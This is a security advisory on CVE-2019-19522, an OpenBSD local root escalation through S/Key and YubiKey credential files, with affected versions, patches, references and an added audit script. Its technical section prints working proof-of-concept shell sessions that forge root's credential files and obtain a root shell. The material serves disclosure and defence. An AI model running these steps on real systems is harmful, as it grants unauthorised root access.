Allele Security Alert
ASA-2019-00653
Identifier(s)
ASA-2019-00653, CVE-2019-19522
Title
Local privilege escalation via S/Key and YubiKey
Vendor(s)
The OpenBSD Project
Product(s)
OpenBSD
Affected version(s)
OpenBSD versions 6.6 before errata 009
OpenBSD versions 6.5 before errata 020
Fixed version(s)
OpenBSD version 6.6 errata 009
OpenBSD version 6.5 errata 020
OpenBSD version 6.6 with the following patch applied:
009_mesaxlock.patch.sig
https://ftp.openbsd.org/pub/OpenBSD/patches/6.6/common/009_mesaxlock.patch.sig
OpenBSD version 6.5 with the following patch applied:
020_mesaxlock.patch.sig
https://ftp.openbsd.org/pub/OpenBSD/patches/6.5/common/020_mesaxlock.patch.sig
Proof of concept
Yes
Description
OpenBSD, in a non-default configuration where S/Key or YubiKey authentication is enabled, allows local users to become root by leveraging membership in the auth group. This occurs because the S/Key or YubiKey file for root can be written to /etc/skey or /var/db/yubikey and need not be owned by root.
Technical details
If the S/Key or YubiKey authentication type is enabled (they are both installed by default but disabled), then a local attacker can exploit the privileges of the group “auth” to obtain the full privileges of the user “root” (because login_skey and login_yubikey do not verify that the files in /etc/skey and /var/db/yubikey belong to the correct user, and these directories are both writable by the group “auth”).
(Note: to obtain the privileges of the group “auth”, a local attacker can first exploit ASA-2019-00651 / CVE-2019-19520 in xlock.)
If S/Key is enabled (via skeyinit -E), a local attacker with “auth” privileges can add an S/Key entry (a file in /etc/skey) for the user “root” (if this file already exists, the attacker cannot simply remove or rename it, because /etc/skey is sticky; a simple workaround exists, and is left as an exercise for the interested reader):
------------------------------------------------------------------------------
$ id
uid=32767(nobody) gid=11(auth) groups=32767(nobody)
$ echo 'root md5 0100 obsd91335 8b6d96e0ef1b1c21' > /etc/skey/root
$ chmod 0600 /etc/skey/root
$ env -i TERM=vt220 su -l -a skey
otp-md5 99 obsd91335
S/Key Password: EGG LARD GROW HOG DRAG LAIN
# id
uid=0(root) gid=0(wheel) ...
------------------------------------------------------------------------------
If YubiKey is enabled (via login.conf), a local attacker with “auth” privileges can add a YubiKey entry (two files in /var/db/yubikey) for the user “root” (if these files already exist, the attacker can simply remove or rename them, because /var/db/yubikey is not sticky):
------------------------------------------------------------------------------
$ id
uid=32767(nobody) gid=11(auth) groups=32767(nobody)
$ echo 32d32ddfb7d5 > /var/db/yubikey/root.uid
$ echo 554d5eedfd75fb96cc74d52609505216 > /var/db/yubikey/root.key
$ env -i TERM=vt220 su -l -a yubikey
Password: krkhgtuhdnjclrikikklulkldlutreul
# id
uid=0(root) gid=0(wheel) ...
------------------------------------------------------------------------------
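The following audit script is an added example, not part of the original advisory or of OpenBSD: it walks /etc/skey and /var/db/yubikey and reports every entry whose owner is not the user the file name denotes, which is the condition login_skey and login_yubikey did not check. It assumes the layout shown above (/etc/skey/<user>, /var/db/yubikey/<user>.uid and <user>.key) and takes an optional user-to-uid lookup command (a hypothetical parameter, used here so the check can be exercised on constructed files).

```shell
#!/bin/sh
# Added example (not from the advisory or OpenBSD): report S/Key and
# YubiKey entries that are not owned by the user they name.
# Assumed layout: /etc/skey/<user>, /var/db/yubikey/<user>.uid, <user>.key

# owner_uid FILE: print the numeric owner uid. ls -ln is POSIX, whereas
# the stat(1) flags differ between GNU and BSD.
owner_uid() {
    ls -ln "$1" | awk '{ print $3 }'
}

# audit_dir DIR [LOOKUP]: print one line per suspicious entry and return
# 1 if any were found, 0 otherwise. LOOKUP is a command that maps a user
# name to its uid and fails for unknown users (default: id -u); it is a
# hypothetical hook so the audit can be run against constructed files.
audit_dir() {
    dir=$1
    lookup=${2:-id -u}
    rc=0
    [ -d "$dir" ] || return 0
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        name=${f##*/}
        name=${name%%.*}            # root.uid / root.key -> root
        if ! expected=$($lookup "$name" 2>/dev/null); then
            echo "UNKNOWN-USER $f"  # entry for a user that does not exist
            rc=1
            continue
        fi
        actual=$(owner_uid "$f")
        if [ "$actual" != "$expected" ]; then
            echo "MISMATCH $f owner=$actual expected=$expected"
            rc=1
        fi
    done
    return $rc
}

# audit_all: check both credential directories; run as root on the host,
# since /etc/skey and /var/db/yubikey are not readable by other users.
audit_all() {
    status=0
    audit_dir /etc/skey || status=1
    audit_dir /var/db/yubikey || status=1
    return $status
}
```

A non-zero exit from audit_all means at least one entry would be accepted for a user who does not own it and should be inspected before S/Key or YubiKey logins are trusted.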
Credits
Qualys Research Team
Reference(s)
OpenBSD 6.6 Errata
https://www.openbsd.org/errata66.html
OpenBSD 6.5 Errata
https://www.openbsd.org/errata65.html
009_mesaxlock.patch.sig
https://ftp.openbsd.org/pub/OpenBSD/patches/6.6/common/009_mesaxlock.patch.sig
020_mesaxlock.patch.sig
https://ftp.openbsd.org/pub/OpenBSD/patches/6.5/common/020_mesaxlock.patch.sig
Constrain honouring of path-related environment variables based upon
https://github.com/openbsd/xenocara/commit/5886ab525a096cb2504f9e3ce1cd4fd79fb1e414
Full Disclosure: Authentication vulnerabilities in OpenBSD
https://seclists.org/fulldisclosure/2019/Dec/14
oss-security – Authentication vulnerabilities in OpenBSD
https://www.openwall.com/lists/oss-security/2019/12/04/5
Bugtraq: Authentication vulnerabilities in OpenBSD
https://seclists.org/bugtraq/2019/Dec/8
ASA-2019-00651 – OpenBSD: Local privilege escalation via xlock
https://allelesecurity.com/ASA-2019-00651/
CVE-2019-19520
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19520
CVE-2019-19520
https://nvd.nist.gov/vuln/detail/CVE-2019-19520
CVE-2019-19522
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19522
CVE-2019-19522
https://nvd.nist.gov/vuln/detail/CVE-2019-19522
If there is any error in this alert or you wish a comprehensive analysis, let us know.
Last modified: February 11, 2020